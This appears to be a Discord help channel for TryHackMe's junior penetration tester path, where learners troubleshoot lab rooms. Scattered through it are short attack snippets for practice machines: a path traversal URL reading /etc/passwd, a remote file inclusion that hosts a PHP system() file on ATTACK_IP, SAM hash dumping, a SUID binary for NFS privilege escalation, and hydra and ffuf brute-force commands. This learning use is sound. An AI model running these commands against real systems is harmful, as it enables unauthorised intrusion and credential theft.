#junior-pentester-path

Gave +1 Rep to @neon geyser (current: #35 - 230)

Hi all, im on the beginning of this path… im learning a lot of thing, but would like to do something for impront these concepts and not forget them. There is any easy machine/ctf Walkthrough? If yes what’s the name? Thanks

Taking good notes. You can never underestimate how helpful that can be. There are lots of tools you can use such as Notion, CherryTree and others.

I'm finishing up the jr pentester course and the privilege escalation exercises are getting to be a bit of a pain. Every time I flip between the attack box and the server (a new one each task, 9 total) it refreshes both and I'm waiting a while for them to reconnect and it clears everything in the server

Is this normal/to be expected? I'm almost done so I guess it's a sign to slow down a bit lol

https://tryhackme.com/r/room/windowsprivesc20
this room at the end of the path uses wget in powershell a lot in examples. wget doesn't work on the provided machine, I don't have a normal windows OS to check with to see if it would normally, but it's not setup as a command or alias or anything. curl works just fine though.
not sure if the instance machines changed or what.
just pointing it out.

it does usually work, ig it's an alias to Invoke-WebRequest or smth.

try that and see if it works.

OH
it's in powershell, I was still in cmd.

why does windows have two terminal apps with different commands?
why use powershell for that instead of just cmd?

cmd is not as powerful as powershell.
it's literally a power-shell lol.
powershell replaced cmd, cmd is just there as an option if you want to use it.

that makes sense I guess.
I'm learning I need a windows install to mess around with

I use a Win7 VM for vulnerable things and debugging

What are the free rooms that i can learn pen testing from beginning

https://tryhackme.com/r/resources/blog/free_path

Thank you

Gave +1 Rep to @stark turtle (current: #578 - 8)

Hi everyone, I had a small doubt:

The Windows PrivEsc room(The last one).
I am doing the SeBackup/SeRestore part. The output of whoami /priv is :

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

I am confused since the SeBackupPriv and SeResotorePriv are disabled...still I was I able to backup the sam and system hives

Afternoon all.
Does the THM Attackbox not have the metasploit-framework/data/wordlists directory? I can't see to find it

check in /usr/share/wordlists ?

I got stuck on this for over an hour, the issue was that the question read for lab6 but the answer was under lab5.php, vs lab6.php, made no sense to me but had to go online and look it up. SPOILER: ||http://10.10.188.88/lab5.php?file=....//....//....//....//etc/passwd||

hello,
i am having a problem with task 8 of the file inclusion room, specifically the rfi for the playground. when i host my server with either apache2 or python, have the php file in the directory, and try to use the server to gain rce, it doesn't show me what i need to see even though i think i am doing it right.
i have used this url: http://thm-box/playground.php?file=http://my-server-ip/hostname.txt

Hi, i'm having problem with task 5 and 6 in nmap basic port scan room. Run the the nmap command as the walkthrough is not showing any open port have 4 digit, is this bug?

Did you start the VM for task 5?

I have tried on both VM and VPN.

I mean, Task 5 has a new target machine

yep. I start the machine by click the button in task 5.

is each task have separate machine to spawn?

Task 4, 5 and 6 all have different target machines, yes.

okay. I will try again.

Am I the only one for whom the flag for Task 6 of the Content Discovery Room doesn’t work?

Wdym?

I found the flag but when I try to send it, it tells me that the flag is incorrect

What task/question? What is the flag you found?

Can anyone give me some pointers on how to start this pathway without paying? As of now I'm not going to subscribe, but I might change my mind later if I like the courses.

I am completely new to cybersecurity, but I am pretty adept with tech in general.

Welcome to the platform. Learning paths do require a subscription unfortunately, but feel free to browse THM content as there are over 900 rooms, with ~60% of those being free.

ok, thanks!

Sorry, late arrival!

On the Roadmap under Learn on THM, you can select "Free Roadmap" and do the rooms under "Penetration Tester" (towards the bottom of the map). Alternatively, you can also click on "View Path" from the THM website dashboard and try clicking into different rooms to see if they're available.

I’m doing the junior pentester path to learn pentesting, I’ll take the other pentesting courses tryhackme has to offer, but is there anything else anyone would recommend me do?

dir

Hi. What's your goal? Are you focused mainly on pentesting ?

Hi. Anyone have problem with some task required to use C code to get a root shell in Linux Privilege Escalation room? I always face to "GLIBC 2.34" not found. I'm not familiar with C.

hey all, i'm at the Windows Privilege Escalation room on task 6
at the step where i'm running python3.9 /opt/impacket/examples/secretsdump.py -sam share/sam.hive -system share/system.hive LOCAL
i'm getting this output
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction failed: 'NoneType' object is not subscriptable
[*] Cleaning up...

Reading on the impacket tool says that they fixed the NoneType error
i have tried updating impacket and pipx,
anyone else run into this, am i missing a step or something?

did you tried to use different exploit?

No. I try following step by step in the task. Maybe moving to use bash script.

which exact task do you struggle with?

recently is privilege escalation via NFS. Task 11. I use chatGPT about compile C code. It give a idea to compile with -static flag to make sure the binary can run without depend on the library is missing or not on the target machine. But i'm not try.

ah, then I can't help for now as didn't do that yet

okay.

ok, I have found how to do it. libc.so.6 file is outdated so we have to compile self-contained binary to not depent on this library:

1. install musl compiler
   sudo apt install musl-tools
2. compile stanalone binary
   sudo musl-gcc -static -o nfs nfs.c

sudo chmod +s nfs

Now you should be able to run this file on the target machine

Gave +1 Rep to @tepid furnace (current: #2358 - 1)

Thanks. But u don't need to write it in detail. Just give me an idea. Try and research by myself is the best practice.

You are right, I have a habit from work where I have to describe everything in detailed 😅
Will have that in mind in the future

In the Linux Priv Escalation final challenge is there another way to escalate privilege other than the SUID? I spent a good amount of time trying to exploit the PATH variable but failed. Very curious

Hi everyone, I solved the File Inclusion Task 8 RFI challenge as follows:

1. Created a page.php file with the content:
   ||```php
   <?php system('hostname'); ?>

2. Started a Python HTTP server:
```bash
python -m http.server 80

3. Accessed the vulnerable URL:

http://MACHINE_IP/playground.php?file=http://ATTACK_IP/page.php

What do you think of this solution? Thanks

Have you figured this out?

https://tryhackme.com/r/resources/blog/free_path

Ey

Finally completed this entire path.

Congrats buddy , great job 😄

Thank you kind sir

Gave +1 Rep to @violet brook (current: #12 - 715)

Hey all. I'm currently working on the Windows Privilege Escalation room, on Task 6 - Abusing dangerous priviliges. I go to Start Machine, but it doesn't spawn a Windows machine. I tried to RDP using the AttackBox, but it's asking for a login key ring. 😦 Unless I'm doing something wrong?

just hit cancel.

omg 😦 Thanks!!!

Gave +1 Rep to @remote iris (current: #1 - 3072)

Hola alguien que hable español?

Has anyone here been able to get a job doing the junior pestenting course?

Just to let you know buddy, that won't get you a job. The Junior Pentester Pathway provided by Tryhackme is to make you understand what is involved in pentesting like fundamentals for pentesting. There is more to it but what is included in the pathway needs to be learned before you start your journey to pentesting

So it is essential for your knowledge and skills

But for more advice on that check #cyber-and-careers

thanks!

Linux Privilege Escalation - Task 6 - Why do I see that Karen cannot run commands with sudo privileges when I run sudo -l?
$ hostname wade7363 $ uname -a Linux wade7363 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux $ whoami karen $ id uid=1001(karen) gid=1001(karen) groups=1001(karen) $ sudo -l [sudo] password for karen: Sorry, user karen may not run sudo on wade7363.

I’m sorry for the question, I’ve solved it. Unfortunately, I didn’t shut down the virtual machine from the previous task, and I didn’t start the one for Task 6. It was a mistake caused by distraction.

Hi everyone, im having issues completing the room File Inclusion, i got to the last part but struggled. im planning on starting over from the beginning, but is there another room that i should maybe take a look at that might help me finish the file inclusion room?

That room is really good for beginning 🙂 . Which part causes the confusion 😄 ?

@violet brook on task 8 first flag, the whole "The input form is broken! You need to send POST request with file parameter!" had me confused. But i just realized that theres a link on HTTP web basics that i totally ignored like a dummy before posting here.

You can change request method in Burp by right clicking on request > change request method 🙂

Yeah i saw that in the hint, but i remember learning about burp in another room, there wasnt much info about burp in the file inclusion room (aside from what is says on task 8 step 4 ). which is why i was wondering if there were other rooms that maybe i should go over again. I apologize if theres something i missed

You're doing great 🙂 . If you need any help in the future or you have any further questions now feel free to drop a message here 🙂

Perfect! thank you

Hey guys,
Can someone help me out with an error i am facing with ffuf in one of the rooms for this path?

Getting the following error when i try hitting the command -

user@ashen moss$ ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.210.174/customers/signup -mr "username already exists"

Error -

: Progress: [494/10164] :: Job [1/1] :: 5 req/sec :: Duration: [0:01:48] :: Error

Hi, I would like to ask for help walking the application under the Jr Pentester course on the flag related to viewing the page source. Particularly on how to get the hidden files.

Which task?

Have you tried reconnecting your OpenVPN? 5 req/sec seems slow and could be indicative of connection-related issue.

Task 3

No, i dont see an option to do this anywhere. Any suggestions on how i can try this out ?

How are you accessing the THM network currently - OpenVPN or Attackbox?

Attackbox

If its the Attackbox, you don't need to connect to THM OpenVPN. However, it is odd that the number of req/sec is only 5.

user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}

None of the ffuf commands work for me. It started with this^ command, where it works if i dont specify the size of the results .

Did you click on the green Start Machine button and replace the machine_ip with the target IP address?

for the Subdomain Enumeration room, I keep getting an error saying my answer is incorrect, not sure what is up but that is the answer that I come up with.

domain beginning with S 🙂

Yes i had done this

getting an increased no of requests per min now but still errored response -
Progress: [1907/1907] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:12] :: Errors: 0 ::

This is the command i ran -
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport/thm" -u http://10.10.203.71 -fs 472

.thm not /thm 🙂

Ah sorry, but its the same issue when i try with .thm as well :/

(moved to room help)

Are you sure this is the correct file size 🙂 ?

Hi, I'm having some trouble in the Authentication Bypass room. I created a new folder on desktop with mkdir, moved to the folder and created a users.txt file and entered the users from previous room, using echo command, however when I enter the provided command: ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.181.152/customers/login -fc 200 I don't receive the user and password. And I changed the name of my txt file

Can you provide a screenshot ?

this is what I get, not sure if I should send an ss with previous commands since the users will show

Can you use cat on a wordlist 🙂

hmm this is odd... I can't see the file now

I just used the the cat command earlier and it worked

and now it can't find the file

Type ls in your dir 🙂

yes I did that, sorry my bad it works now

Glad to hear that , keep up the good work 😄

I forgot I renamed the txt file to valid_users

let me try again the ffuf command

I had the same issue last night but when used echo command forgot to insert the names ina string

Is everything ok now 😉 ?

the window atack box is unresponsive (?) I think I might have to restart the machine, will keep you posted

Ok 🙂

hmm...yes, I get the same error, created the folder again and when I use cat valid_usernames.txt, the names are displayed

Can you tell me which task is this ?

is the brute force task

what is the valid username and password (format: username/password)

Are you sure that your IP is correct ?

I also noticed this

yes I checked

it went back to normal after refreshing the page sorry abou that :)

Can you provide a ss of your list ?

the txt file with the names?

YEs

after executing cat?

Yes

Can you try to type in new line

Like one below the other

will do, how do I do that with echo? thes the /n work?

Well , yeah just press enter after each one to put them in line below , make sure there's no extra spaces after the word 🙂

yeah faster like this :) one sec

it worked

Glad to hear that 🙂

thank you! :D

Gave +1 Rep to @violet brook (current: #3 - 2144)

new line makes a difference

should i delete the previous ss?

No need for that , it will stay for users that will have similar/same problem in the future 🙂

thanks again, should have thought to put them on separate lines 😩

You have found the correct username , but formatting was bad in .txt file 😄 . If you put them all in one line the request would look like :
simon steve robert admin : password
We don't want that, so we changed the format and put each in separate line , so now requests will look like :
simon : password
steve : password
robert : password
admin : password
🙂

yes, makes sense like this :D will keep this in mind

You're doing great , keep up the good work 😄

Thank you :) have a good one

Gave +1 Rep to @violet brook (current: #3 - 2145)

Hey

FI_LAB{RCE}

how to make hte terminal to look like this

Looks good , what's the problem here 🙂 ?

Go to Appearance settings 🙂

thanks, you are an amazing AI bot

Gave +1 Rep to @violet brook (current: #2 - 2316)

I'm real 😢

it is hard to believe tbh

Thanks, everything is okey 🙂

Gave +1 Rep to @violet brook (current: #2 - 2319)

Hmmm... This path seems intresting

and it is

May i enroll, and uncover some dirty secrets about it

you should it is very informative and I think it is a good step if you want to be in red teaming

Ofc, thats what im intrested in, but im far from the basics

what path are you studying now?

Just finished it, had some knowlege before so, some of em was easy some of em hard

you can see writeups on medium or YouTube videos for paid rooms

I figured that, if i was stuck i did my research on those platforms.. Quession is which one i should enroll tomorrow

yeah this is good, but I am talking about the paid rooms to complete a path with paid rooms

I take that advise for sure! Thank u!

I’m having trouble fully wrapping my head around SQL injections, I wonder if I should just learn more SQL basics

How exactly does UNION in SQL work

Definitely , you even have a room on THM that teaches that , check it out 🙂
https://tryhackme.com/room/sqlfundamentals

Oh yes I completed that one 😄

You can also check freeCodeCamp on YT to learn more about sql 🙂

Hey guys anyone with an idea of how to poison the auth.log server with php script on web server with ssh I’m having difficulties with that

Which room ?

Not in the Junior path it’s Include challenge room

Hi, I'm doing Burp Suite Intruder. The problem is, how do I use a simple list? Is it only for the Pro version?

Which task ?

task 12 extra mile

I'm having trouble with Authentication Bypass Brute Force Task. I put in the command as shown but no output

Can you use cat valid_usernames.txt

This is what the file looks like in pluma. I just used > in the last task

Oh , edit that

seems like you have some whitecharacters

Remove spaces and new lines

When I do that and run the paasword command it says Progress: [100/100] but when I don't it's Progress: [400/400] and since it's top 100 passwords I think it's supposed to be 400. So I'm not sure that's the problem

Can you cat the password list ?

Can you get the users file again

When I get rid of the spaces the cat just come blank

Delete your old list and open sublime on AttackBox

This is what happened when I get rid of the status filter on the password command

I think we have wrong formatting in users file 🙂

Can you open it using sublime

This is it in Sublime

Delete those white characters before username

I removed those characters in sublime now the output looks like this

Provide ss of the list

Just to make sure

Provide ss?

screenshot

Looks good

Can you provide your current command here

ok I got it working

Great job 🙂 🚀

Just wondering, if I am following this path (I know it's not enough to get me fully become pro in this field). What I am wondering is if I am planning to do easy rooms on the website, where I least need to be on this path?

Do I need least finish Web Fundamentals? But isn't that still havent taught me much about hacking

Don't do Complete Beginner . It's a bit outdated and it has been replaced by Cyber 101 , do it instead of Complete Beginner 🙂 . When you finish it , you can start with some easier/guided CTFs 🙂 .
https://tryhackme.com/path/outline/cybersecurity101

So I was following this last week, you suggest continue this one instead another one?

Yes, exactly 🙂

Okay, thanks

Gave +1 Rep to @violet brook (current: #1 - 3421)

So by the time I finishes 101, I pretty much can do some easy rooms?

Yes , I would recommend something like this for the beginning 🙂
https://tryhackme.com/room/basicpentestingjt

Cool thanks again

Also if you're looking to start with CTFs , try to avoid some with riddles , steganography and suchlike for the beginning . Try to do some more realistic ones . Even if some are labeled as easy ,they're also full of some rabbit holes which can be pretty frustrating/confusing if you're beginner 🙂 .

I have been in the field tech a while now, so I understand how it kind works, but I will keep that in mind as I go.

@heavy night ⬆️

@ember yarrow sorry for double ping but above is scam

in every channel 💀

Hello, I want to ask how to switch to the room view. I have never seen it like this.

You can find roadmap on the link below
https://tryhackme.com/hacktivities/

I saw in the challenge room like the lookup room and some others it seems to have bugs because in the lookup room when i use metasploit the right way very simple like in the walkthrough it doesn't work. Sometimes it get annoying when i cannot finish the room.

this is mine，，

Yeah that's how it looks like

But it shows the specific room, I want to know if it will be shown after the above path is completed🤔

You can search for the room on the link below
https://tryhackme.com/hacktivities/search?page=1

emmm i think you misunderstand what I mean. I mean his roadmap shows the rooms owned by each path, but what I see is just the name of a path.😂

Which path are you interested in ?

Just completed the Linux Privesc Capstone without needing to look at a write-up... Feeling pretty proud of myself 😄

Congrats , great job 🙂 🚀

pentest path

Here it is 🙂
https://tryhackme.com/path/outline/jrpenetrationtester

i just wanna ask how can i get this page😂 my page is not like this hh

Click on the link above

click where?

https://tryhackme.com/path/outline/jrpenetrationtester

on this link

yes this is my look

Click on enroll in path

yes?

Here's your list of rooms , select room that you want from that list and that's it 🙂

yes i know your mean，but this guy look like this，i just want to know how to get the style like this
https://cdn.discordapp.com/attachments/900054524373397574/1333959461441896528/Screenshot_20250129_013824_com_android_chrome_ChromeTabbedActivity.jpg?ex=67be628f&is=67bd110f&hm=3ec43a3ac1ed3b40c52e74aaf9a2137b65104416160a2f20b247d7a881bcc052&

😹

That's a free roadmap

here's the full map

oh

You can't see this if you're premium user

😂 ok iknow

Thanks @abstract pilot for sharing the map 🙂

Gave +1 Rep to @abstract pilot (current: #363 - 17)

https://tenor.com/view/sherlock-benedict-cumberbatch-hat-tip-greetings-smile-gif-4268618

Please can anyone teach me how to bypass play protect antivirus

why on the machine in the challenge room "brute it" , ssh2john: command not found ? I wrote the right syntax. it's not the first time it happen to me

Check out in /opt directory

yes i took a look ok and what's next ? what do you want me to do ?

Check /opt/john dir , ssh2john.py should be there

yes i saw it

Use it then 🙂

yes now i do ssh2john.py id_rsa > hash and it still says the same thing

What does it say ?

ssh2john.py: command not found

python3 /opt/john/ssh2john.py id_rsa > hash

ok thanks it worked, i would have not guessed alone try hack me did not warned me for this one and one internet nobody were saying that

Gave +1 Rep to @violet brook (current: #1 - 3673)

Hi everyone I'm having some troubles with this

If you look at the URL, you'll see something unusual

Hello guys, sorry i just have a little question... when we are in some room on thm, how can we determine the value of MACHINE_IP? some moment i have the really value of ip address but generally i have MACHINE_IP. It's why i don't have always the great response

You'll need to click on the green Start Machine button associated with the task you are working on.

Depending on the target machine, it can spin up in ~2 to 5 mins.

yes i have done it but i have the same thing

man i just finished beginner yesterday, now im on the pentester route😂

Congrats , great job 🙂 🚀 . Keep up the good work 💪

Which room are you on? There are rooms that have multiple target VMs attached.

yesss, thanks i have found the solution

Gave +1 Rep to @prisma raptor (current: #12 - 774)

Hi does anyone know what's the easiest "hard" ctf challenge room ? i completed pentester junior since a while and did some challenge room level easy and medium.

Stick with easier rooms for now 🙂

for the room /fileinc

Task 8 (Challenge) question 3: capture flag3. I am capturing my traffic with burpsuite and changed the method to post. In burpsuite I change the file variable to ../../../etc/flag3%00 but the nullbyte at the end does not seem to work (the error says that ../../../etc/flag3%00.php does not exist. I followed a few walkthroughs and this is the exact method that they use. Am I doing something wrong or is there a bug in the room?

for now I will just have to copy the flag from the internet since I believe that I am not doing anything wrong 😦 but I would love to know what is the problem here

How did you change method to POST ?

Does anyone know where the server address of tryhackme's servers is? I want to buy a vps close to the it.

Infrastructure is cloud based which means it's distributed. You can choose VPN server based on your location on access page 🙂

Yes, but I also have a lot of latency using openvpn on my computer

so i want to buy a vps close to it

Even if you do, won't you still have the latency for the connection between the VPS and your device?

but it maybe will shorter than before(?

my friend do this, and he is😂

Depends on your ISP I guess. I imagine it would be marginal though (assuming you are selecting the closest THM OpenVPN server as @violet brook said).

yes i mean select a vps close to it,and use the closest THM openvpn

Are you already using the VIP THM OpenVPN server?

In the form with inspect element. This works because the . and / is not filtered out anymore

Intercept request in burp > right click on the interceptes request > change request method

I did that

Hi, i finished junior-pentester-path 1 month ago and since then did one challenge room per day on average, mostly easy ones with some medium, i looked at walkthrough often, and now i take the habit of ctf and get used to the methodology but still, need walkthrough sometimes to not waste my time.
Do you think i could start working in a company with an entry-level job in the field ? Like a pentester junior like it is wrote on try hack me? Or at least to be in a team working with pentesters and learning before i do the job myself alone?
Btw I would like a remote job, for me it’s important.
What do you think about that ?

Suggest to post this on #cyber-and-careers to get more traction.

Your right

Yes, I am a subscriber now

Which THM OpenVPN server are you using?

i use the EU-VIP-2

Still not happy with the connection speed? 😅 If you don't mind, are you somewhere within the EU or the US?

No, my country has a firewall policy..... that's why the latency is so high😢

Today may be better, now i use EU-VIP-2 and choose a U.K. node vpn, now my latency Stable at around 280ms🤓

Oohh.. I understand the challenge or frustration now...

yes...

does anybody know why the ctf machine are not starting on try hack me it always said "an error occured"

It seems there was an issue earlier today, but it is resolved now.

Try to refresh the page when that happens

yes that's what i was doing but it was really on thm website the problem. Now it's over it's good

Btw, you what do you think about my message earlier yesterday about getting a job as a begginer. Because i did not got ay response in the cyber-and-careers channels either. It seems hard to start with a job with no experience and the practical certifications seems to be only for advanced hacker.

Try to re-send your message in #cyber-and-careers. I don't feel competent to give career advice 🙂

Pentester path has me nervous, I just seen like 4 capstone challenges. I thought it was just to teach you, but there are capstone challenges and a ctf in this path. And im half way into this path im considering if I should just take a break or keep going but the capstone is going to be a struggle

Capstone is a final challenge and it defintely isn't easy

Where is capstone challenges link

Here 🙂
https://tryhackme.com/room/redteamcapstonechallenge

hey does someone got the ejpt notes? I need them, you feel free to send here or DM

In the room Nmap: post port scans, I am unable to solve task 4; NSE. Question 3. I have a service listening on port 53. And I'm asked to supply the full version value but what I got from running the nmap seems incorrect. I got the version dnsmasq-2.90. Does anyone know what I'm doing wrong

Can you please verify and provide a screenshot 🙂 ?

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Start the machine first , go to top of the task and press green Start machine button

After starting the machine. I typed this command nmap -sC 10.10.102.207 (which is my machineIP) and I got dnsmasq-2.90

That's your AttackBox probably , as far as i can see you haven't even started target machine at all

Provide shot of scan

Specify port 53

nmap -sC -sV <ip> -p53

Try to restart machine , make sure to start new machine directly from task 4

@violet brook from my last scan. The port is not open

allow 10min for macine to bootup

Okay. It solved now

Thank you so much for your help and patience

anytime 🙂

Hi Korny,
I have the same issue and I've tested maybe 4 hours yesterday evening.
I tried maybe most of the solutions on medium and also the ones here inside discord.
Burp, curl etc.
It's not working.
I have no idea what's going on.
Chall1 and 2 fine.
But 3 is not working anymore. You're not getting even a path back after switching to POST.
Only with get, but there you can try what ever you want. . and / are removed.
I even tried to run the POST with base64 link. Also not working...
Today, last 30 minutes => samesame. I thought, maybe I made some issues yesterday due to fatigue...

Thanks for the reply! I completely forgot about it. Nice to know that it's (probably) not my fault. I guess we have to file a bug report for this then

Gave +1 Rep to @obtuse halo (current: #2756 - 1)

Room works fine I can confirm that 🙂

i am not able to run this netcat code?

can anyone help me

Command is running properly

but its over 5 min not even get anything

This is just listener it waits for an incoming connection . You need to trigger it from somewhere

how can i plzz help me

which room ?

task 8

plzz check

What are you trying to do ?

What is the question ?

i am not getting this output as mentioned in the room

You're getting exactly that

no not getting

Yes , you're . You started your listener

yes, i got it thanks

Hi, I got a problem with in the linux privilege escalation room on task 9 cronjobs. It seems like the cronjobs are not running. I have rebooted the attached VM several times. Does anyone experience the same issue?

Have you added +x permission to backup.sh script ?

😄 thank you man, so simple im blind

Everything ok now 🙂 ?

Just going through the JrPentester path on THM. I had some trouble in the What the Shell room one one question in a task. It wanted me to try nc and socat between windows machine and the attackbox. I figured the solution is to upload precompiled static binaries to the windows machine so that I'd be able to use socat/nc on it. Is it just me, or is it very hard to actually find these for windows?

It shouldn't be , I think that both of those binaries should be available on GitHub 🙂

They were actually installed already lol @violet brook, just had to find where

So , everything is ok now 🙂 ?

All good!!

Glad to hear that , keep up the good work 🙂

Just finished Billing room too 🙂

Congrats 🙂 🚀 🔥

link in file inclusion room, not opening

502 gateway error message

Which task?

solved

how do i solve my machine IP not showing, after lauching attack box

Are you referring to the target or the attackbox?

i can't upload images
i meant this http://MACHINE_IP/support/login

after lauching the attack box, i still don't get my machine ip

you'll need to verify your account to post screenshots or images

@dusty coyote

The attackbox and the target machine are two separate machines.

this is the issue i am facing, no machine ip for me
@prisma raptor

Scroll to the top.

open Task 1 and click start machine.

done

okay issue solved, thanks

Hi! Currently finishing the privilege escalation module and i wanted to know if any of the people that already finished the path could suggest some challenge rooms at this level to get some hands on practice. Thank you!

This one definitely + it has a video walkthrough if you get stuck 🙂
https://tryhackme.com/room/basicpentestingjt

thank you so much, it's perfect

Why is the screen black when I use my vps to connect to the room's rdp?

I use windterm

Which room are you working on?

I found the reason. It was due to the regional firewall restriction. In fact, the echo was displayed but the speed was very slow.

..oh god damn it firewall restriction

I completed the Linux privilege escalation room. Are there any other challenges or room recommendations that I can use to continue practicing this skill?

You want challenge or walkthrough ?

Challenge, i want to challenge the machine.

Try this one 🙂
https://tryhackme.com/room/smol

thank you!

Gave +1 Rep to @violet brook (current: #1 - 4488)

Hi, im having Problems with the File Inclousions room. I Modefied the Request just as Statet to POST and gave a File Parameter and cant seem to get a Output not even a Error Message

Can Someone point me a hint where im going wrong here?

Try to use Burp to change the method

I did but also no result to really work of

Try to add the file=.... as part of the URL or request parameter and not as a payload.

hmm maybe im borderline stupid but even then i dont seem to get it to work with "/challenges/chall1.php?file=../../../../etc/flag1"

as the Post request

Which task is that?

Task 8 Challange 1

In Files Inclousion Room

Hey.. did you manage to figure it out?

nope went out for Lunch since i couldnt figure it

aahh.. you still in the room?

yep

Got it. In challenge 1, inspect the html code particularly on the form..

Hmm will do Ty 😄

On the line beginning with form action and notice the request method.

ok got it Thank you 🙂

Did you manage to solve it?

yes, managed the Rest aswell. But have to say the last challange was by far the easyest imo.

How do I send image

I also have some problem to show?

You will have to verify first 🙂
https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Thanks again

Gave +1 Rep to @violet brook (current: #1 - 4546)

I can't see flag, Why?

See, still can't see.

What are you trying to do ? Which task ?

Jr pentester - Web hacking- File inclusion - task 8 last challenge RCE

That ip doesn't seem correct , use your tun0 ip

Hey NB what port are you serving cmd.php on?

When I run this - I have a python web on <ATTACK-BOX-IP>:9001

so input is ... http://<TARGET-IP>/playground.php?file=http://<ATTACK-IP>:9001/cmd.php

that looks good

Why did I get this?

Site isn't well optimized for mobile

No, this is an email sent to me, saying I got a badge

this one

Oh congrats 🙂 🚀 . You were the 1st in your league last week and you got the badge for that 🙂

Okay, but I don't think I was number one. It's not in the top five, and then it sent me this today. It's really strange.😂 😂

I'm only getting 200 status why? Jr pentester - Burp suite - Intruder - Last challenge.

Try to sort by length

can anyone help me i ma stuck here Blind SQLi - Time Based in

https://tryhackme.com/room/sqlinjectionlm

What is the problem?

Already did sir but the length is also the same

Try to disable url encode these characters option in Intruder settimgs and run attack again

Still same issue

take a shot of your request and response

You mean this?

Done I Found Solution In Older Chat

no go to intruder settings

What exactly do you want to see and in Intruder settings where I can find that req and response, I used hydra to crack and it worked perfectly but with this only 200

ok found the problem, the problem was wrong request i was using get instead post.

Is it necessary to learn java script for XSS and SQL for sql injection?

Of course

OK and how much exactly like, basic knowledge or advance?

Depends what you want to do but the more you know - the better 🙂

Right

Can you tell me after completing Web hacking path, What should I learn after that, I wanna learn in more deeper about web hacking/pentesting and want to solve labs, so please guide me, Sir.

You can go with Web App Pentesting path then 🙂

Hello, I am currently doing Net Sec Challenge, the ftp flag question and Hydra has been working for the past 45 minutes. Is this normal or am I doing something wrong?

No , provide a shot

Sorry, i restarted hydra once, so it doesnt show the correct time

used the command : hydra -l eddie -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp

what's your command ?

ftp is not running on default port in this case

oh shit, right

My bad

Thanks @violet brook

Gave +1 Rep to @violet brook (current: #1 - 4637)

Hi there, the vm for the task 11(NFS) in the linux privilege escalation room is failing to load, the vm for task 10 loaded fine. This is the error message. Any tips?

happening with task 12 too 😦

We've pinged staff , problem should be resolved soon 🙂

Not sure if I am in the right channel, but can someone give me a general idea of how to read a text file in the payload area of task 5 of Server-side Template Injection Task 5? My brain is not recalling how to read the file, but I have made it through to were I can list the contents of the directory.

Hi is someone els having issiues with Flags not beeing accepted? Im currently in the Room SQK Injection Task 6 and got the flag but it wont accept it

Try to refresh the web page

did so, same Result

That doesn't seem like a correct flag for task 6

hmm but its the one i got for that Task. Did i do sth wrong or is it mby a bug?

refresh thm page use lab provided in task 6

It dosnt have a lab in task 6 its the Lab from Task 5 that has levels for the following Tasks

i think this task it has a sort of rolling lab(?) so once you get the flag for level 2, press the blue "level 3" button to continue

oh wait yeah sorry I misunderstood; I've just checked the task itself, you'll need to press the "Level 3" button, then enter the flag that is shown on the next page

Hey guys, in the active recon room where we need to use telnet for the given IP address. Do you know why it is not working for me? The telnet always fails...I am sure my IP address is correct and I am using port 80 as suggested.

Can you provide a screenshot ?

telnet <Target IP> 80 Are you using like this?

Solved it already, I needed to restart the machine and attack box, because it wasn't working for some reason...

yep, was using exactly this syntax, but solved already, thanks though!

Gave +1 Rep to @upbeat helm (current: #2830 - 1)

Maybe you were using wrong machine that task has multiple machines . Whenever you see machine icon in task header it means that it has different machine than other tasks 🙂

Yes, exaclty. I think, this was the case.

hi again 🙂 I am working on the net sec challenge room. Where I am on this step: "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"

I'm guessing here since I know 2 usernames I can use: hydra -l eddie -P /usr/shared/wordlists/rockyou.txt -f <ip> ftp -V, right? However, it's been some time and no matches :/ Do I need to specify some other arguments, so it goes quicker or skip some things or I just simply need to be more patien? 😄

hello

Have you tried it for user quinn as well?

FTP is running on non-standard port in this case , you also need to specify that port 🙂

Hello

Quick one 1️⃣ please going through other wire shark room and something bugs me really

Exercise file when I do the expert analysis I gt 12 count as warning

Went to a walk through and number is 1638 what might be the issue

I did yes

yeah, it is...ah, ok, I didn't know that, thanks a lot!

Gave +1 Rep to @violet brook (current: #1 - 4698)

BTW, I am currently like 80% done with jr pentester path. Are there any good and easy CTFs that you'd recommend to look into and be challenged with and where I can also test all the things I've learned in this particular room? 🙏

You can try this one for example 🙂
https://tryhackme.com/room/billing

Thanks, will do that!

Gave +1 Rep to @violet brook (current: #1 - 4700)

Thanks KGB, for the recommendation. I've just finished the Billing CTF. It was super nice, however I needed to jump on YT and look for some advice as I was stuck mainly for the last part with the fail2ban-client and setting up the payloads there. However, I've made notes, so will keep it for the future for sure!

Gave +1 Rep to @violet brook (current: #1 - 4701)

Great job , maybe you can try this one also . It is similar but a bit easier than billing 🙂
https://tryhackme.com/room/silverplatter

thanks! I will definitely look into it 😉

Gave +1 Rep to @violet brook (current: #1 - 4703)

